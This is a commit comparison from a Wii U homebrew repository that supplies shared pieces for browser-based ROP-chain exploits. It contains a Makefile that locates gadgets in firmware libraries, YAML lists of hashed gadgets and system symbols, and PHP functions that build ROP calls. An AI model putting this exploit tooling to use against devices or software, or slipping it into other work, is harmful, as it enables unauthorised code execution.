The-Homebrew-Cloud/wiiuhaxx_common
2
0
Fork 0
mirror of https://github.com/wiiu-env/wiiuhaxx_common.git synced 2024-06-02 22:28:45 +02:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: The-Homebrew-Cloud:0.2
Branches Tags
The-Homebrew-Cloud:master
The-Homebrew-Cloud:0.4
The-Homebrew-Cloud:0.3
The-Homebrew-Cloud:0.2
The-Homebrew-Cloud:0.1b
The-Homebrew-Cloud:0.1
...
compare: The-Homebrew-Cloud:master
Branches Tags
The-Homebrew-Cloud:master
The-Homebrew-Cloud:0.4
The-Homebrew-Cloud:0.3
The-Homebrew-Cloud:0.2
The-Homebrew-Cloud:0.1b
The-Homebrew-Cloud:0.1

5 Commits
0.2 ... master

Author SHA1 Message Date
orboditilt
8d5b8ab0b6 Remove unused scripts 2019-02-25 19:02:41 +01:00
orboditilt
0a24047530 - Reduce number of dependencies. 
-Fix GX2 addresses for 5.3.2
 2019-02-25 18:59:47 +01:00
orboditilt
b6909c596b Add GX2Init symbol 2019-02-25 17:47:42 +01:00
orboditilt
254d89a32c Add some wrappers for calling functions 2019-01-23 21:13:12 +01:00
orboditilt
4b56cb4cd0 - Improve makefile to compile/build/download only when needed. 
- Add support for getting gadgets from gx2.rpl
- Add some new rop address to be searched
 2019-01-23 21:10:08 +01:00
7 changed files with 143 additions and 70 deletions
Show Stats Expand all files Collapse all files

58
Makefile
View File

@ -22,38 +22,54 @@ export READELF := $(PREFIX)readelf
export OBJCOPY := $(PREFIX)objcopy
DEFINES :=
COREINIT_PATH := tmp/$(FIRMWARE)/000500101000400A/code/coreinit.rpl
COREINIT_PATH_ELF := $(COREINIT_PATH).elf
ifeq ($(OS),Windows_NT)
exe_ext := .exe
else
exe_ext :=
endif
COREINIT_CONFIG_PATH := coreinit.yml
GX2_CONFIG_PATH := gx2.yml
COREINIT_PATH := tmp/$(FIRMWARE)/coreinit.rpl
GX2_PATH := tmp/$(FIRMWARE)/gx2.rpl
TARGET_FILENAME := wiiuhaxx_rop_sysver_$(FIRMWARE).php
GADGET_FINDER_PATH := bin/rpxgadgetfinder.jar
all: loader locateall
loader:
loader: wiiuhaxx_loader.bin wiiuhaxx_searcher.bin
wiiuhaxx_loader.bin: wiiuhaxx_loader.s
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_loader.elf wiiuhaxx_loader.s
$(OBJCOPY) -O binary wiiuhaxx_loader.elf wiiuhaxx_loader.bin
wiiuhaxx_searcher.bin: wiiuhaxx_searcher.s
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_searcher.elf wiiuhaxx_searcher.s
$(OBJCOPY) -O binary wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin
locateall: locate532 locate550
locate532:
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 11464 -out tmp/532
make locatespecific FIRMWARE=532 TEXTADDRESS=0x0101c400
make locatespecific FIRMWARE=532 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
locate550:
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 15702 -out tmp/550
make locatespecific FIRMWARE=550 TEXTADDRESS=0x0101c400
locatespecific:
./bin/rpl2elf$(exe_ext) $(COREINIT_PATH) $(COREINIT_PATH_ELF) > /dev/null
sh ./wiiuhaxx_locaterop.sh $(COREINIT_PATH) $(TEXTADDRESS) $(exe_ext) > wiiuhaxx_rop_sysver_$(FIRMWARE).php
make locatespecific FIRMWARE=550 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
checkrpl: $(COREINIT_PATH) $(GX2_PATH)
$(COREINIT_PATH):
if [ -a $(COREINIT_PATH) ]; then $(error missing $(COREINIT_PATH) for FW $(FIRMWARE)); fi;
$(GX2_PATH):
if [ -a $(GX2_PATH) ]; then $(error missing $(GX2_PATH) for FW $(FIRMWARE)); fi;
$(CONFIG_FILENAME):
if [ -a $(CONFIG_FILENAME) ]; then $(error missing $(CONFIG_FILENAME)); fi;
$(GADGET_FINDER_PATH):
if [ -a $(GADGET_FINDER_PATH) ]; then $(error missing $(GADGET_FINDER_PATH)); fi;
locatespecific: checkrpl $(GADGET_FINDER_PATH) $(CONFIG_FILENAME)
@echo "Finding symbols for FW $(FIRMWARE)"
@echo "<?php" > $(TARGET_FILENAME)
@java -jar $(GADGET_FINDER_PATH) -cin $(COREINIT_CONFIG_PATH) -bin $(COREINIT_PATH) -aoff -$(ADDRESS_OFFSET_COREINIT) >> $(TARGET_FILENAME)
@java -jar $(GADGET_FINDER_PATH) -cin $(GX2_CONFIG_PATH) -bin $(GX2_PATH) -aoff -$(ADDRESS_OFFSET_GX2) >> $(TARGET_FILENAME)
@echo "?>" >> $(TARGET_FILENAME)
clean:
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_* tmp
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_*

11
README.md
View File

@ -1,15 +1,16 @@
# README
This fork is supposed a common base for Wii U ROP-chains.
This fork is supposed to be a common base for Wii U ROP-chains.
## Building
Before using the ROP-chain, some files need to be compiled/generated, you can do it with `make`.
The makefile expects some binaries/files.
- `bin/ropgadget_patternfinder(.exe)` [Download](https://github.com/wiiu-env/ropgadget_patternfinder/releases)
- `bin/rpl2elf(.exe)` [Download](https://github.com/wiiu-env/rpl2elf/releases)
- `bin/FileDownloader.jar` [Download](https://github.com/wiiu-env/NUSFileDownloader/releases)
- `common.key` containing the retail Wii U common key (in binary form, 16 bytes).
- `bin/rpxgadgetfinder.jar` [Download](https://github.com/wiiu-env/RPXGadgetFinder/releases) (requires Java 11(!))
- `tmp/532/coreinit.rpl` from 00050010-1000400A OSv10 v11464
- `tmp/532/gx2.rpl` from 00050010-1000400A OSv10 v11464
- `tmp/550/coreinit.rpl` from 00050010-1000400A OSv10 v15702
- `tmp/550/gx2.rpl` from 00050010-1000400A OSv10 v15702
When you have all needed files, you can use `make`.

74
coreinit.yml Normal file
View File

@ -0,0 +1,74 @@
!!de.orb.wiiu.rpxgadgetfinder.SymbolList
symbols:
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: memcpy, out: $ROP_memcpy}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: DCFlushRange, out: $ROP_DCFlushRange}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: ICInvalidateRange, out: $ROP_ICInvalidateRange}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSwitchSecCodeGenMode, out: $ROP_OSSwitchSecCodeGenMode}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSCodegenCopy, out: $ROP_OSCodegenCopy}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCodegenVirtAddrRange, out: $ROP_OSGetCodegenVirtAddrRange}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCoreId, out: $ROP_OSGetCoreId}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCurrentThread, out: $ROP_OSGetCurrentThread}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSetThreadAffinity, out: $ROP_OSSetThreadAffinity}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSYieldThread, out: $ROP_OSYieldThread}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSFatal, out: $ROP_OSFatal}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: _Exit, out: $ROP_Exit}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenFlipBuffersEx, out: $ROP_OSScreenFlipBuffersEx}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenClearBufferEx, out: $ROP_OSScreenClearBufferEx}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_Acquire, out: $ROP_OSDynLoad_Acquire}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_FindExport, out: $ROP_OSDynLoad_FindExport}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: __os_snprintf, out: $ROP_os_snprintf}
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
yHAg7FCY0T7dPuDQ0BMToKXwp5N/NsD19OlQMWWuM/s=
out: $ROP_POPJUMPLR_STACK12
size: 16
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
3s/zyode/BqcPQrHYY8++j0zylm9P9YCp0fTRpvVwAA=
out: $ROP_POPJUMPLR_STACK20
size: 16
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
UwYkiCHAcqnPXHHJRpFx4XzSlm9m/H1hLOec/41dEko=
out: $ROP_CALLFUNC
size: 52
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
9OdgU6ZcVx8rO4xsbd6XPJX4ibzPCiLrlknLx4EMjpg=
out: $ROP_CALLR28_POP_R28_TO_R31
size: 44
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
R0G4Y63PdC+JKMSFo588yGKUadHdzPnmjJ3RwlNB8JE=
out: $ROP_POP_R28R29R30R31
size: 32
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
lylzvoB06SsPEPxfu6rvbCjikF+ZAHZUzXNaX9aZM/w=
out: $ROP_POP_R27
size: 20
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
b18R/cRB3e+PIYnLyQBlF8SRf89ul1y4y+sjc7+OjKI=
out: $ROP_POP_R24_TO_R31
size: 20
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
5gL2bPiq3E1efbB0rZuPv6QZD4YqghXPJvcHpJypUHA=
out: $ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM
size: 40
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
Xh+0gQ/2+4a7Uz8gUDBt5uA+CUUIh99ssixthRHD4mc=
out: $ROP_SETR3TOR31_POP_R31
size: 24
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
XO0YJxjoIEwpnqH44pWEGgMl7kk4k7hgU952LMDu+0g=
out: $ROP_Register
size: 12
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
hash: !!binary |-
xFfDPPQrAMLgC5bixrCXhIZDvBcui9yfDn2XToM4YLY=
out: $ROP_CopyToSaveArea
size: 12

5
gx2.yml Normal file
View File

@ -0,0 +1,5 @@
!!de.orb.wiiu.rpxgadgetfinder.SymbolList
symbols:
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Init, out: $ROP_GX2Init}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Flush, out: $ROP_GX2Flush}
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2DirectCallDisplayList, out: $ROP_GX2DirectCallDisplayList}

22
wiiu_browserhax_common.php
View File

@ -8,7 +8,7 @@ if($ropchainselect == -1)
$ropchainselect = 1;
}
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect != 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect < 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
if(!isset($sysver))$sysver = -1;
@ -510,6 +510,26 @@ function generateropchain_type3(){
ropgen_OSFatal($payload_srcaddr);
}
function ropgen_GX2DirectCallDisplayList($addr,$size){
global $ROP_GX2DirectCallDisplayList;
ropgen_callfunc($ROP_GX2DirectCallDisplayList, $addr, $size, 0x0, 0x0, 0x0);
}
function ropgen_GX2Flush(){
global $ROP_GX2Flush;
ropgen_callfunc($ROP_GX2Flush, 0x0, 0x0, 0x0, 0x0, 0x0);
}
function ropgen_Register($namePtr,$nameSize,$arg3,$arg4){
global $ROP_Register;
ropgen_callfunc($ROP_Register, $namePtr, $nameSize, $arg3, $arg4, 0x0);
}
function ropgen_CopyToSaveArea($namePtr,$nameSize,$srcAddr,$srcLen){
global $ROP_CopyToSaveArea;
ropgen_callfunc($ROP_CopyToSaveArea, $namePtr, $nameSize, $srcAddr, $srcLen, 0x0);
}
function generateropchain_type4()
{
global $ROP_OSFatal, $ROP_Exit, $ROPHEAP, $ROPCHAIN, $payload_tmp_address, $wiiuhaxxcfg_searchpayloadfilepath, $payload_start_search,$valid_payload_dst_address, $payload_search_for;

34
wiiuhaxx_locaterop.sh
View File

@ -1,34 +0,0 @@
ospath=$1
coreinit_textaddr=$2
extension=$3
reloc=$((0x02000000-$coreinit_textaddr))
getcoreinit_symboladdr()
{
val=`powerpc-eabi-readelf -a "$PWD/$ospath.elf" | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
printf "$2 = 0x%X;\n" $((0x$val-$reloc))
}
echo "<?php"
./bin/ropgadget_patternfinder$extension $ospath.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script #?1EFE3500?
echo ""
getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
getcoreinit_symboladdr "OSCodegenCopy" "\$ROP_OSCodegenCopy"
getcoreinit_symboladdr "OSGetCodegenVirtAddrRange" "\$ROP_OSGetCodegenVirtAddrRange"
getcoreinit_symboladdr "OSGetCoreId" "\$ROP_OSGetCoreId"
getcoreinit_symboladdr "OSGetCurrentThread" "\$ROP_OSGetCurrentThread"
getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
getcoreinit_symboladdr "_Exit" "\$ROP_Exit"
getcoreinit_symboladdr "OSScreenFlipBuffersEx" "\$ROP_OSScreenFlipBuffersEx"
getcoreinit_symboladdr "OSScreenClearBufferEx" "\$ROP_OSScreenClearBufferEx"
getcoreinit_symboladdr "OSDynLoad_Acquire" "\$ROP_OSDynLoad_Acquire"
getcoreinit_symboladdr "OSDynLoad_FindExport" "\$ROP_OSDynLoad_FindExport"
getcoreinit_symboladdr "__os_snprintf" "\$ROP_os_snprintf"
echo "?>"

9
wiiuhaxx_locaterop_script
View File

@ -1,9 +0,0 @@
--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
--patterntype=sha256 --patterndata=e602f66cf8aadc4d5e7db074ad9b8fbfa4190f862a8215cf26f707a49ca95070 --patternsha256size=0x28 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = "
--patterntype=sha256 --patterndata=5e1fb4810ff6fb86bb533f2050306de6e03e09450887df6cb22c6d8511c3e267 --patternsha256size=0x18 --addval=0xFFFFFCFC "--plainout=$ROP_SETR3TOR31_POP_R31 = "